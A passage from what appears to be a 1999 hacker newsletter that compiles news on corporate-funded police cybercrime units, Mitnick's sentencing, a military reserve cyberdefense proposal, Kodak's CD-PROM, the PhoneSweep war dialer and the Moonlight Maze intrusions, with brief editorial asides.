  2149.       simple approach: Subsidize the local police.
  2150.            From inside pilferage and brazen heists to Internet piracy and industrial
  2151.       espionage, digital crime in the United States cost computer hardware and
  2152.       software companies about $3 billion last year.
  2153.            Authorities, who concede they are barely making a dent in the
  2154.       problem, insist they don't have the staff, resources or public support to
  2155.       tackle the overwhelming number of complaints.
  2156.            But the computer companies do. Corporate largess ranges from a
  2157.       $100,000 annual grant from Intel that pays for police salaries in Oregon to
  2158.       Motorola Corp. and several other major PC firms donating $10,000 each
  2159.       to an annual fund to help underwrite the Austin (Texas) Police
  2160.       Department's cyber team.
  2161.            This controversial practice has divided the law enforcement
  2162.       community between those who embrace the help and those who insist it is
  2163.       a means of buying justice.
  2164.            It also underscores a nationwide dilemma: How can local police
  2165.       departments protect the high-tech sector--and the jobs and tax revenue it
  2166.       provides--if there isn't enough money to handle such cases?
  2167.            While investigating the Hewlett-Packard case, members of the
  2168.       Sacramento Valley Hi-Tech task force traveled nationwide, at company
  2169.       expense, to serve search warrants, arrest suspects and confiscate
  2170.       evidence.
  2171.            Before federal criminal charges were filed, however, Hewlett-Packard
  2172.       filed a civil fraud suit against a company in San Diego believed to be tied
  2173.       to the $500-million scheme. Hewlett-Packard used evidence gathered, in
  2174.       part, in the officers' travels to resolve its suit and ultimately obtain a
  2175.       stipulated judgment in its favor for $900,000.
  2176.            "When companies are directly paying for travel, investigations or
  2177.       salaries, I think that's a very dangerous line that quickly crosses into a
  2178.       conflict of interest," said former FBI Agent Joe Chiaramonte, president of
  2179.       the San Jose chapter of the High Technology Crime Investigation Assn., a
  2180.       trade group.
  2181.            But police Sgt. Tom Robinson, who heads up the Hillsboro, Ore.,
  2182.       computer unit, sees it differently: "Frankly, any department that's not
  2183.       [accepting such grants] is missing the boat."
  2184.            Advocates such as Robinson insist the money represents the key to
  2185.       winning the war on cyber crime, and is a small investment for the
  2186.       multinational companies. 
  2187.            "If you're inferring that we're paid off, that's not right," said
  2188.       Sacramento County Sheriff's Sgt. Michael Tsuchida. "I'll eat your dinner,
  2189.       sleep in your hotel and still arrest you if you're breaking the law."
  2190.  
  2191.            'We All Realized We Needed Each Other'
  2192.            Traditionally, many corporations have shied away from revealing too
  2193.       much to law enforcement to avoid drawing public attention to internal
  2194.       troubles. But as computer piracy grows, companies today are much more
  2195.       willing to seek help from police agencies. 
  2196.            Catching such criminals has long been the bailiwick of federal
  2197.       prosecutors, as tech-savvy criminals rarely stay within the neat confines
  2198.       of city limits when committing fraud on the Internet or stealing computer
  2199.       components.
  2200.            But federal law prevents prosecutors and the FBI from taking
  2201.       corporate contributions to pay for salaries or travel expenses, and limits
  2202.       the use of evidence collected by private investigators.
  2203.            State laws, however, have created a much broader gray area for local
  2204.       police. As a result, some local agencies rely on corporate handouts.
  2205.            When losses mounted from armed robberies at computer chip plants in
  2206.       Austin in the early '90s, the city's high-tech companies decided to finance
  2207.       a private nonprofit group to train officers to deal with the problem.
  2208.       Through the Austin Metro High Tech Foundation, firms including IBM
  2209.       and Dell Computer Corp. annually donate up to $10,000 each for
  2210.       investigators' training, travel and equipment.
  2211.            In return, businesses--including Applied Micro Devices, National
  2212.       Instruments and Motorola Corp.--say they expect law enforcement to
  2213.       treat computer crime as seriously as drugs and gang violence.
  2214.            Because Texas law restricts direct corporate contributions to
  2215.       particular police units, the funds are managed and distributed through the
  2216.       Austin Community Foundation, a nonprofit entity.
  2217.            "[The companies] can tell us what equipment we can or can't buy, but
  2218.       they can't tell us what to do with the cases," said Police Sgt. Robert
  2219.       Pulliam, who runs the department's five-person computer crime team.
  2220.       "We all realized we needed each other."
  2221.            This circle of financial interdependence has evolved slowly, from a
  2222.       long-standing tradition of police getting information from private
  2223.       investigators hired by the corporations.
  2224.            Companies typically approach police when they have enough evidence
  2225.       to back up a search warrant, said Los Angeles County Deputy Dist. Atty.
  2226.       William Clark, who prosecutes many trademark cases.
  2227.            Law enforcement then assembles the case. The corporate
  2228.       investigators often serve as experts, helping to identify fake products or
  2229.       explain the workings of stolen technology.
  2230.            Microsoft is the most aggressive technology firm when battling thieves,
  2231.       police say. In Hong Kong, the company runs its own stings, setting up
  2232.       fake storefronts as a means of gathering evidence, sources say.
  2233.            In the United States, Microsoft employs a security force of more than
  2234.       200 people, some of them former law enforcement officers, who
  2235.       investigate cases and package the evidence, which they hand over to
  2236.       authorities for prosecution.
  2237.            "As a matter of policy, we don't pay law enforcement to do their jobs,"
  2238.       said Anne Murphy, a corporate attorney with Microsoft's
  2239.       anti-counterfeiting group. "In certain cases, Microsoft has provided
  2240.       financial support for operating expenses for investigations."
  2241.            In 1997, the software giant approached the Los Angeles County
  2242.       Sheriff's Department and offered to help pay for a sting operation.
  2243.            The price? About $200,000 to purchase printing equipment from
  2244.       suspected software counterfeiters, and give officers the tools needed to
  2245.       create an undercover print shop.
  2246.            The department declined.
  2247.            "It's not about the money. It's about how the public perceives the
  2248.       money and how it's being used," said Det. Jess Bembry, who worked for
  2249.       the department's Asian Organized Crime unit at the time. "When defense
  2250.       attorneys start screaming, all anyone cares about is avoiding the
  2251.       perception of impropriety."
  2252.            The rich scent of wet soil and warm grass wafts across Hillsboro, a
  2253.       bedroom community of Portland, Ore., that has traded its agricultural roots
  2254.       for a future in high-tech manufacturing. This town of 68,000 more than
  2255.       doubles in population during weekdays, as workers flood into the
  2256.       catacomb of industrial facilities that have sprung up throughout the city's
  2257.       rolling hills.
  2258.            As Oregon's largest private employer, Intel's influence is pervasive. In
  2259.       blue-collar Hillsboro, it is difficult to distinguish the line between corporate
  2260.       philanthropy and corporate influence.
  2261.            At the Hillsboro Chamber of Commerce, a small plaque that reads
  2262.       "Intel Room" is affixed outside the door of the center's main meeting
  2263.       room--in honor of the company paying to furnish the small space.
  2264.            Though the town represents Oregon's largest high-tech hub, city
  2265.       managers have set aside only 2.7% of the Hillsboro Police Department's
  2266.       annual $9.2-million budget for its seven-person computer crime team.
  2267.            There's no need to commit more, city officials say, because Intel
  2268.       catches the shortfall: $100,000 a year, which pays the salary of one of the
  2269.       police officers and some expenses, according to a 1996 city memorandum
  2270.       of understanding obtained by The Times. Additionally, Intel purchased one
  2271.       officer's car, and helped pay for the team's offices, computer
  2272.       workstations, telephones and fax machines.
  2273.            Of all 231 cases Hillsboro's high-tech team has tackled between 1995
  2274.       and April 30 of this year, about 41% involve Intel in some way. As of
  2275.       April, about one-fifth of the nearly $210 million the unit recovered is tied
  2276.       to Intel complaints.
  2277.            Police say the grant, which is permitted by Oregon state law, has not
  2278.       swayed their focus. Investigators attribute the case ratio to black-market
  2279.       demand for fake Intel computer chips and the company's size.
  2280.            "This may not be the ideal way for us to do business, but at least we're
  2281.       trying to do something about these crimes," said Police Sgt. Robinson,
  2282.       whose team includes members of the FBI and the U.S. attorney's office.
  2283.       "Without us, the criminals run rampant and impact everyone--the
  2284.       companies and the community," he said.
  2285.            Intel executives insist that their "nontraditional approach" of working
  2286.       with police is legitimate and harmless. It is, they say, merely part of a
  2287.       companywide philosophy to invest in the communities where employees
  2288.       live and work--not a means of gaining police protection.
  2289.            "It'd be dead wrong to criticize the police unless we could make a
  2290.       contribution," said Chuck Mulloy, a corporate spokesman for Intel.
  2291.            Other cities are modeling their efforts after Hillsboro. Chandler, Ariz.,
  2292.       which has several Intel manufacturing and assembly centers, plans to
  2293.       pattern its own nascent computer team after Hillsboro.
  2294.            Such partnerships can hurt the police if companies stop paying, say
  2295.       critics. That's a concern in Hillsboro, where city officials admit there are
  2296.       no guarantees that the Intel grant won't disappear.
  2297.            "The police don't want to hear this, but if we lose the Intel grant, we'll
  2298.       default on the high-tech crime unit," said David Lawrence, Hillsboro's
  2299.       assistant city manager. "We'll have to go back to what we had before,
  2300.       which wasn't much."
  2301.            Inside a bland concrete warehouse on the edge of Sacramento's city
  2302.       limits, the Sacramento Valley Hi-Tech unit is the quintessential modern
  2303.       police model for fighting computer crime. The task force was created in
  2304.       1995 and draws officers from 16 enforcement agencies.
  2305.            The team's diverse membership--officers from different jurisdictions
  2306.       who possess varied skills--is the key to its strength.
  2307.            "These guys have the best reputation among law enforcement," said
  2308.       L.A. County Sheriff's Det. Bembry. "They do amazing things with very
  2309.       few financial resources."
  2310.            Each agency pays for its officers' salaries, equipment and vehicle. But
  2311.       the departments don't feed into the team's general operating budget, which
  2312.       is zero, said Sgt. Tsuchida, who runs the unit.
  2313.            By comparison, the department's narcotics team receives at least
  2314.       $55,000 a year for similar costs.
  2315.            "We serve at least 50 search warrants a year," Tsuchida said. "We
  2316.       couldn't get the $150 a person to get the training to make sure everyone
  2317.       does it the same way. That's a safety concern."
  2318.            The financial slack is often covered by local technology companies,
  2319.       which contribute seized assets and occasionally kick in for travel and
  2320.       other expenses, Tsuchida said. 
  2321.            "If the companies don't pay, we can't investigate" some out-of-town
  2322.       cases, said Sacramento County Sheriff's Lt. Jan Hoganson, who
  2323.       commands the unit. "We can't afford it."
  2324.            Cost was a factor in the recent Hewlett-Packard software theft case,
  2325.       which investigators say has links extending from the Central Valley to
  2326.       Southern California, the Pacific Northwest and Central America.
  2327.            Bill Conley, president of US Computer Corp. in Redmond, Wash., is
  2328.       one of several people Sacramento's unit arrested in conjunction with the
  2329.       case. The charges, of possessing stolen H-P goods, were later dropped,
  2330.       but Conley insists the case was tainted.
  2331.            "It was the Hewlett-Packard people--not the Redmond police, not the
  2332.       Sacramento cops--who led the whole thing, who took employees off and
  2333.       threatened to take them to jail," said Conley, 41.
  2334.            Police, prosecutors and Hewlett-Packard officials scoff at Conley's
  2335.       claim, and cite other types of white-collar crimes, such as insurance fraud,
  2336.       which routinely relies on the private sector for enforcement help. And
  2337.       Sacramento's Hoganson insists his team's focus is unbiased, they say,
  2338.       noting that of the 285 cases the team investigated in 1998, only 16 were
  2339.       tied to companies that are members of the unit's steering committee.
  2340.            But the California Supreme Court takes the issue seriously. In a 1996
  2341.       trade secrets case, the court upheld the disqualification of a Santa Cruz
  2342.       County district attorney because the office had accepted more than
  2343.       $13,000 from a Scotts Valley software company, Borland International.
  2344.            The money was used to hire a computer expert to determine whether
  2345.       a former executive had taken proprietary information to a rival firm,
  2346.       Symantec Corp.
  2347.            Police and prosecutors say the Hewlett-Packard case is different
  2348.       because the corporation's involvement did not influence their decision to
  2349.       file criminal charges.
  2350.            "I don't see [it] as a conflict, because you're giving law enforcement
  2351.       the money--not the district attorney's office," said Robert Morgester, a
  2352.       deputy attorney general for the state attorney general's office who helped
  2353.       create and fund the Sacramento team. 
  2354.            California legislators are trying to offset the money pinch, by rolling out
  2355.       a $1.3-million state grant to be divided among three task forces:
  2356.       Sacramento, San Jose and Los Angeles/Orange County. In addition, the
  2357.       governor's office has set aside an additional $1 million for the same
  2358.       purpose.
  2359.            Investigators say that although the grant helps, it's still not enough.
  2360.            "That money is already spent on training, hiring new people and getting
  2361.       my guys new computers," Tsuchida said. "We're not breaking any laws
  2362.       now, so why should we change what we're doing?"
  2363.  
  2364.       Copyright Los Angeles Times. 
  2365.  
  2366. 14.0 Mitnick sentencing postponed again...
  2367.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2368.     
  2369.      http://www.zdnet.com/zdnn/filters/bursts/0,3422,2302198,00.html
  2370.     
  2371.      Monday; Jul26th 10:46a
  2372.      Mitnick sentencing postponed again
  2373.      The sentencing of convicted hacker Kevin Mitnick was postponed for a second time today. 
  2374.      The government is asking for Mitnick to be responsible for restitution on the order of $1.5 million,
  2375.      while the defense is asking for payments on the order of $5,000, based on his projected earnings 
  2376.      potential during his supervised release. He will not be able to use a computer during that three 
  2377.      year-period. More details to follow. --ZDNN staff 
  2378.     
  2379.      @HWA
  2380.    
  2381.    
  2382. 15.0 Military Reserves to be Used for Cyber Defense 
  2383.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2384.       
  2385.       From HNN http://www.hackernews.com/
  2386.       
  2387.       contributed by Sarge 
  2388.       The Reserve Component Employment Study 2005,
  2389.       commissioned by Defense Secretary William Cohen, has
  2390.       concluded that Reserve units are probably the best
  2391.       choice to help secure military systems. The study says
  2392.       that members of a this new unit could work remotely
  2393.       and should be recruited from high-tech sectors of the
  2394.       civilian population. (Hmmmm, maybe I should reenlist?)
  2395.  
  2396.       Federal Computer Week
  2397.       http://www.fcw.com:80/pubs/fcw/1999/0726/fcw-newsreserve-07-26-99.html
  2398.       
  2399.       JULY 26, 1999 
  2400.  
  2401.  
  2402.      Study calls for reserve virtual IT warfare unit
  2403.  
  2404.      BY DANIEL VERTON (dan_verton@fcw.com)
  2405.  
  2406.      A year-long study completed last week by a senior panel of Defense
  2407.      Department officials recommended an unprecedented expansion in the role the
  2408.      reserves play in national defense, including the formation of a virtual
  2409.      cyberdefense unit to protect the nation's critical infrastructure.
  2410.  
  2411.      The study, Reserve Component Employment Study 2005, was initiated in April
  2412.      1998 at the request of Defense Secretary William Cohen and concluded that the
  2413.      reserves are "particularly well-suited to homeland defense missions." In addition,
  2414.      the study called for the formation of a "joint [reserve component] virtual
  2415.      information operations organization" and tasked various senior-level DOD
  2416.      organizations to complete a "proof of concept" study for creating the unit by
  2417.      June 30, 2000.
  2418.  
  2419.      The new reserve cyberdefense unit "would consist of individuals with
  2420.      information technology skills who could perform their duties from dispersed
  2421.      locations rather than working as a single consolidated unit at a specific training
  2422.      center," the report said. To accomplish their mission of protecting various critical
  2423.      infrastructure nodes, the unit would communicate from existing reserve centers
  2424.      and other DOD facilities across the country that have access to the Secret
  2425.      Internet Protocol Routing Network.
  2426.  
  2427.      To form the new unit, the study recommended looking for reserve members in
  2428.      regions of the country where high concentrations of IT skill already exist. 
  2429.  
  2430.      In addition, the study suggested that the reserves consider recruiting
  2431.      high-tech-savvy people from the civilian sector, requiring them to join the
  2432.      reserves for a specific number of years in exchange for high-tech training
  2433.      provided by DOD.
  2434.  
  2435.      Establishing a "virtual organization" also would go a long way toward solving the
  2436.      department's problem of retaining personnel with critical IT skills and may allow
  2437.      DOD to reduce its reliance on external contractor support, the report said. "A
  2438.      'virtual organization' [also] could support the Joint Task Force [for] Computer
  2439.      Network Defense," the report said. Cohen established the JTF-CND in
  2440.      December 1998 to monitor and take defensive actions against hackers and other
  2441.      unauthorized users who try to penetrate DOD networks.
  2442.  
  2443.      Rick Forno, a security officer for Network Solutions Inc. and the former senior
  2444.      security analyst at the House of Representatives' Information Resources
  2445.      Security Office, said the report's recommendation to use the reserves for cyber
  2446.      defense "is a great idea" and represents one of DOD's more innovative
  2447.      initiatives. "I'm thrilled that DOD is looking to go outside the box on the
  2448.      Info-Protect/InfoCorps idea in the reserve components," said Forno, who
  2449.      proposed a similar idea to DOD a year ago. However, "it comes down to
  2450.      endorsement and support from senior leadership [whether or not] they let this
  2451.      organization function as intended," he said.
  2452.  
  2453.      Anthony M. Valletta, vice president of C3I systems for SRA Federal Systems
  2454.      and former acting assistant secretary of Defense for command, control,
  2455.      communications and intelligence, said the concept of using the reserves in this
  2456.      manner is one that the intelligence community has proven works. 
  2457.  
  2458.      "When we did this with the intelligence community, it worked extremely well,"
  2459.      Valletta said. "We have a lot of expertise in the reserves that we need to take
  2460.      advantage of."
  2461.  
  2462.      The main challenge facing the reserve cyberdefense corps idea, according to
  2463.      Valletta, is training and equipping the reserves to carry out the mission. "We
  2464.      have to keep up with the technology, and the reserves have to have the latest
  2465.      capabilities," Valletta said. "That is a major change of philosophy in terms of
  2466.      equipping the reserves."
  2467.  
  2468.      However, the idea of establishing a JTF for Homeland Defense also is an idea
  2469.      that some groups, particularly civil liberties organizations, may question.
  2470.  
  2471.      "The main issue is the Posse Comitatus Act and the limits on military activity
  2472.      within the U.S.," said Mark Lowenthal, former deputy assistant secretary of
  2473.      State for intelligence and now a member of Valletta's C3I consulting team at
  2474.      SRA. "If it is limited to what are clearly DOD facilities, then there should be no
  2475.      problem," he said. "If it steps over that line, then there are some legal issues that
  2476.      have to be addressed."
  2477.  
  2478.      Other recommendations contained in the report include using the reserves as
  2479.      part of a Joint Task Force headquarters for Homeland Defense, which would
  2480.      work with the Federal Emergency Management Agency and other civil
  2481.      authorities to coordinate responses to attacks involving nuclear, chemical and
  2482.      biological weapons, and increasing the use of smart card technology to reduce
  2483.      delays in processing reserve members for active-duty assignments. 
  2484.  
  2485.      @HWA 
  2486.      
  2487. 16.0 Kodak's new PROM copy-killer?
  2488.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2489.       
  2490.       From HNN http://www.hackernews.com/
  2491.  
  2492.         Kodak Introduces CD-PROM, Claims to Thwart Pirates 
  2493.  
  2494.  
  2495.       contributed by WareZ dud3 
  2496.       Kodak has introduced a new CD technology it calls
  2497.       CD-PROM or CD-Programable Read Only Memory. It
  2498.       combines the standard CD with a small section of CDR
  2499.       that will contain specific information about the machine
  2500.       the software is registered to. Kodack claims this will
  2501.       stop piracy in its tracks. (It might stop the warez dudes
  2502.       from trading the latest version of Duke Nuke 'Em but it
  2503.       will do nothing to stop the professionals.) 
  2504.  
  2505.       Express News     
  2506.       http://www.expressnews.com/pantheon/news-bus/sheron-tech/2504rkodak_7-25nz.shtml
  2507.       
  2508.       Kodak develops anti-hacker
  2509.       CD 
  2510.  
  2511.       Format is computer-specific, aims to foil
  2512.       non-customers 
  2513.  
  2514.       By Don Sheron
  2515.       EXPRES-NEWS SCIENCE/TECHNOLOGY WRITER 
  2516.  
  2517.       Software pirates have a new technological hurdle ahead of
  2518.       them. Kodak has developed a way to make CD programs
  2519.       more secure from hackers and unlicensed users. 
  2520.  
  2521.       It's a customized CD called the CD-PROM (Compact
  2522.       Disc-Programmable ROM). This includes the standard
  2523.       write-once feature of commercial software, but the
  2524.       CD-PROM also includes a recordable feature that
  2525.       identifies a particular computer to the CD. 
  2526.  
  2527.       "There's a lot of enthusiasm for this technology," said Bruce
  2528.       Ha, senior research associate at the Eastman Kodak Co. of
  2529.       Rochester, N.Y. "It's a format that people have been
  2530.       talking about for the past 10 years now."
  2531.  
  2532.       The new hybrid technology allows software manufacturers
  2533.       to produce low-cost CD-ROMs with the ability to add
  2534.       CD-R (recordable) information. CD-PROM works like a
  2535.       normal CD software product, but using the software
  2536.       requires start-up information specific to the licensed
  2537.       consumer. 
  2538.  
  2539.       For instance, many software CDs require a registration
  2540.       code to unlock some or all of the program's features. To
  2541.       get the registration code, consumers can register their
  2542.       software online with the software manufacturer. To thwart
  2543.       Internet hackers, the CD-PROM will match the registration
  2544.       code with the licensed software, thus keeping hackers from
  2545.       using an illegal copy of the software.
  2546.  
  2547.       Similarly, a CD-PROM is designed to work on software
  2548.       shipped with a specific computer. The CD-PROM can be
  2549.       set up to read only the BIOS information on the computer
  2550.       with which it was shipped. The BIOS (basic input/output
  2551.       system) loads and executes the computer's operating
  2552.       system, such as Windows 98. 
  2553.  
  2554.       "So (Microsoft) Office or any other program that comes
  2555.       bundled with that computer cannot be shared by anyone
  2556.       else," Ha said.
  2557.  
  2558.       But making a CD-PROM has been difficult.
  2559.  
  2560.       A normal CD contains data embedded into "pits" that are
  2561.       pressed into the platter. The platter is then covered by an
  2562.       aluminum reflective layer and a protective plastic coating. 
  2563.  
  2564.       On a CD-R, a single groove is pressed into the platter
  2565.       instead of pits. An organic dye is added for recording new
  2566.       information onto the platter. A reflective layer of gold or
  2567.       silver covers the dye, and then the CD gets a protective
  2568.       coating.
  2569.  
  2570.       Some manufacturers have tried to add both pits and
  2571.       grooves onto a CD. But they have had problems with the
  2572.       disc being read properly. This can occur when the ROM
  2573.       reader switches to the recordable writer, or because the
  2574.       speed of the laser light reading the CD changes when it
  2575.       goes through different materials on the platter. 
  2576.  
  2577.       To get around this, Kodak decided to use a single,
  2578.       continuous groove pressed into the platter. The master disc
  2579.       is designed to make the CD reader think that the groove
  2580.       actually contains a series of pits. 
  2581.  
  2582.       Kodak is using the CD-PROM for its Picture CD product.
  2583.       Ha says no failures have been noticed after beta testing
  2584.       20,000 discs in photo labs. 
  2585.  
  2586.       Saturday, Jul 24,1999
  2587.       
  2588.       @HWA
  2589.       
  2590. 17.0  Sandstorm Releases New Version of Phone Sweep 
  2591.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
  2592.  
  2593.       From HNN http://www.hackernews.com/
  2594.  
  2595.       contributed by Brian 
  2596.       Sandstorm Enterprises has released a new version of its
  2597.       $998 war dialing program called 'Phone Sweep' It does
  2598.       have at least one cool feature, auto recognition of over
  2599.       200 remote systems. Ummm, thanks but I'd rather have
  2600.       the free, non-hardware copy protected, Tone Loc. 
  2601.  
  2602.       Excite News
  2603.       http://news.excite.com/news/bw/990721/ma-sandstorm
  2604.       
  2605.       PhoneSweep
  2606.       http://www.sandstorm.net/phonesweep/
  2607.       Tone Loc - toneloc.zip 
  2608.       http://www.l0pht.com/~oblivion/blkcrwl/telecom/toneloc.zip
  2609.       Tone Loc Utilities 
  2610.       http://www.l0pht.com/~oblivion/blkcrwl/telecom/toneutil.zip
  2611.       
  2612.       Sandstorm Enterprises Announces Single Call Detect -- Advanced Telephone Scanning
  2613.       Technology to be Incorporated Into New Release of PhoneSweep
  2614.                                                                                                                   
  2615.                                                                                              
  2616.     
  2617.                                                                             Updated 10:45 AM ET July 21, 1999
  2618.     
  2619.       Most Significant Development in Wardialing Since the Movie "War Games"
  2620.     
  2621.       CAMBRIDGE, Mass. (BUSINESS WIRE) - Sandstorm Enterprises Inc., an information security tools company, has released an
  2622.       enhanced version of its PhoneSweep telephone scanner, incorporating "Single Call Detect" to dramatically speed scans. Additional
  2623.       features in PhoneSweep release 1.1 include an increase in the number of target systems recognized, to more than 200, and
  2624.       enhancements to the tool's brute force testing mode.
  2625.     
  2626.       PhoneSweep is intended for use by security professionals to audit corporate telephone systems for vulnerabilities, such as
  2627.       undocumented modems tied to internal networks. PhoneSweep works like a computer criminal's "war dialer," and Sandstorm has
  2628.       found an enthusiastic market for PhoneSweep among security professionals who had been using such "hackerware" for lack of a
  2629.       commercially-developed and supported alternative. "A surprising number of corporations, and even Federal agencies, have been
  2630.       using hacker tools like ToneLoc to carry out their telephone scans," said Dr. Ross Stapleton-Gray, Sandstorm's Vice President for
  2631.       Government Relations. "There's a certain irony -- and recklessness -- in relying upon unsupported, undocumented software to
  2632.       secure mission- or national security-critical networks."
  2633.     
  2634.       Single Call Detect allows PhoneSweep to determine if a telephone is answered with a voice, a second dial tone, a fax machine, or
  2635.       a data modem with a single call. The determination is made in less than five seconds, speeding the scanning process. "Dialing
  2636.       numbers and waiting for the modems to synchronize or time out, while simple, is neither efficient nor particularly effective," said
  2637.       James Van Bokkelen, Sandstorm's president. "Single Call Detect allows PhoneSweep to skip rapidly from number to number,
  2638.       ending a call as soon as a voice, busy or second dial tone is detected, and completing the average scan in less than half the time."
  2639.       The speed and accuracy afforded by Single Call Detect also reduces any inconvenience to organizations being scanned, as
  2640.       PhoneSweep promptly releases connections upon encountering a live or recorded voice.
  2641.     
  2642.       In developing PhoneSweep, Sandstorm worked with security expert Peter Shipley, who has scanned several million phone lines in
  2643.       the San Francisco Bay area. Shipley's research has shown unsecured "back doors" at hundreds of sites -- including government
  2644.       and commercial systems -- that allowed full control to any caller without first asking for a username and password. Sandstorm has
  2645.       used Shipley's results to train its recognition engine, and Shipley has used PhoneSweep's recognition system to categorize and
  2646.       tabulate the results of his project.
  2647.     
  2648.       Originally released last October, PhoneSweep is in use by both security departments and independent auditors at hundreds of sites
  2649.       in North America and overseas. PhoneSweep customers include both large and small companies, Federal and state governments
  2650.       and the military.
  2651.     
  2652.       PhoneSweep customers with current support contracts will all receive automatic upgrades to release 1.1. PhoneSweep Basic
  2653.       ($980) supports a single modem and up to 800 phone numbers per scanning profile. PhoneSweep Plus ($2800) supports four
  2654.       modems for simultaneous scanning, and 10,000 number profiles. PhoneSweep Plus8 ($5600) supports eight modems with 10,000
  2655.       number profiles. Sandstorm Enterprises will be exhibiting at the 8th USENIX Security Symposium, August 23-26 in Washington
  2656.       D.C.
  2657.     
  2658.       PhoneSweep(TM) and Single Call Detect (TM) are trademarks of Sandstorm Enterprises Inc.
  2659.     
  2660.       Further details on PhoneSweep and "Single Call Detect" are available on the product Web site, at http://www.phonesweep.com 
  2661.     
  2662.       Contact: Sandstorm Enterprises Inc. In Boston, MA Dick Guilmette, (617) 426-5056 dickg@sandstorm.net or In Washington, DC Dr. Ross
  2663.       Stapleton-Gray, (703) 685-5197 rsgray@sandstorm.net 
  2664.    
  2665.       
  2666.       
  2667.       
  2668.       @HWA
  2669.       
  2670.       
  2671. 18.0  Major FUD - US Under Attack by Russians 
  2672.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2673.  
  2674.       From HNN http://www.hackernews.com/
  2675.       
  2676.       contributed by dis-crete 
  2677.       This article is so filled with FUD (Fear Uncertainty and
  2678.       Doubt) and so many unconfirmable statements it makes
  2679.       me ill. The few facts that are present are old and the
  2680.       rest is there to scare the hell out of you. I'd still like to
  2681.       talk to the guy who claims his print job was redirected.
  2682.       He won't answer my emails. 
  2683.  
  2684.       The London Times
  2685.       http://www.the-times.co.uk/news/pages/sti/99/07/25/stifgnusa03003.html?999
  2686.       
  2687.       The Australian      
  2688.       http://www.theaustralian.com.au/world/4161044.htm
  2689.       
  2690.       -=-
  2691.       
  2692.       The London Times
  2693.       http://www.the-times.co.uk/news/pages/sti/99/07/25/stifgnusa03003.html?999
  2694.       
  2695.       
  2696.                                   
  2697.                  Cyber assault: Clinton wants
  2698.                   an extra $600m to combat
  2699.                   threats such as Moonlight
  2700.                           Maze
  2701.                   
  2702.       Russian hackers steal US weapons secrets 
  2703.      
  2704.                     by Matthew Campbell 
  2705.                         Washington
  2706.      AMERICAN officials believe Russia may have stolen some of
  2707.      the nation's most sensitive military secrets, including weapons
  2708.      guidance systems and naval intelligence codes, in a concerted
  2709.      espionage offensive that investigators have called operation
  2710.      Moonlight Maze. 
  2711.      
  2712.      The intelligence heist, that could cause damage to America in
  2713.      excess of that caused by Chinese espionage in nuclear
  2714.      laboratories, involved computer hacking over the past six
  2715.      months. 
  2716.      
  2717.      This was so sophisticated and well co-ordinated that security
  2718.      experts trying to build ramparts against further incursions
  2719.      believe America may be losing the world's first "cyber war". 
  2720.      
  2721.      Investigators suspect Russia is behind the series of "hits"
  2722.      against American computer systems since January. In one
  2723.      case, a technician trying to track a computer intruder watched
  2724.      in amazement as a secret document from a naval facility was
  2725.      "hijacked" to Moscow from under his nose. 
  2726.      
  2727.      American experts have long warned of a "digital Pearl Harbor"
  2728.      in which an enemy exploits America's reliance on computer
  2729.      technology to steal secrets or spread chaos as effectively as
  2730.      any attack using missiles and bombs. 
  2731.      
  2732.      In a secret briefing on Moonlight Maze, John Hamre, the
  2733.      deputy defence secretary, told a congressional committee: "We
  2734.      are in the middle of a cyber war." 
  2735.      
  2736.      Besides military computer systems, private research and
  2737.      development institutes have been plundered in the same
  2738.      operation. Such institutes are reluctant to discuss losses, which
  2739.      experts claim may amount to hundreds of millions of dollars. 
  2740.      
  2741.      "We're no longer dealing with a world of disgruntled
  2742.      teenagers," said a White House official, referring to previous
  2743.      cases of computer hacking in which pranksters have been
  2744.      found responsible for incursions. "It is impossible to overstate
  2745.      the seriousness of this problem. The president is very
  2746.      concerned about it." 
  2747.      
  2748.      The offensive began early this year, when a startling new
  2749.      method of hacking into American computer systems was
  2750.      detected. A military computer server near San Antonio, Texas,
  2751.      was "probed" for several days by hackers who had entered the
  2752.      system through an overseas site on the internet. 
  2753.      
  2754.      Dozens of infiltrations ensued at other military facilities and
  2755.      even at the Pentagon in Washington. When research
  2756.      laboratories also reported incursions using the internet
  2757.      technique, officials realised that a "cyber invasion" was under
  2758.      way. 
  2759.      
  2760.      "There were deliberate and highly co-ordinated attacks
  2761.      occurring in our defence department systems that appeared to
  2762.      be coming from one country," said Curt Weldon, chairman of a
  2763.      congressional committee for military research and
  2764.      development. "Such a thing has never happened before. It's
  2765.      very real and very alarming." 
  2766.      
  2767.      Even top secret military installations whose expertise is
  2768.      intelligence security have been breached. At the Space and
  2769.      Naval Warfare Systems Command (Spawar), a unit in San
  2770.      Diego, California, that specialises in safeguarding naval
  2771.      intelligence codes, Ron Broersma, an engineer, was alerted to
  2772.      the problem when a computer print job took an unusually long
  2773.      time. 
  2774.      
  2775.      To his amazement, monitoring tools showed that the file had
  2776.      been removed from the printing queue and transmitted to an
  2777.      internet server in Moscow before being sent back to San
  2778.      Diego. "It turned out to be a real tough problem for us," he told
  2779.      a private computer seminar last month. 
  2780.      
  2781.      It is not clear precisely what information was contained in the
  2782.      stolen document. Beyond its role in naval intelligence, Spawar
  2783.      is also responsible for providing electronic security systems for
  2784.      the Marine Corps and federal agencies. It is suspected that
  2785.      several other intrusions had gone undetected. 
  2786.      
  2787.      Oleg Kalugin, a former head of Soviet counterintelligence now
  2788.      resident in Maryland, said such facilities were prime targets for
  2789.      Russian intelligence. He said the Federal Agency for
  2790.      Government Communications and Information, a former KGB
  2791.      unit that specialises in electronic eavesdropping, was certain to
  2792.      be exploiting the internet for spying on America. "That's what
  2793.      they're good at," he said. 
  2794.      
  2795.      America's high-precision technologies, including weapons
  2796.      guidance systems, are of particular interest to a country such
  2797.      as Russia where economic woes have prompted crippling
  2798.      cutbacks in funding for military research. "Russia is quite good
  2799.      at producing technology but can't afford to finance the
  2800.      research," said Kalugin. "It's easier to steal it." 
  2801.      
  2802.      The computer assaults have given fresh impetus to measures
  2803.      ordered by Clinton more than a year ago to protect the
  2804.      country's electronic infrastructure. Alerted to the threat of
  2805.      Moonlight Maze, the president has called for an extra $600m to
  2806.      help fund a variety of initiatives, including an infrastructure
  2807.      protection centre in the FBI to gauge the vulnerability of
  2808.      computer systems to attack. 
  2809.      
  2810.      He has ordered the military to develop its own information
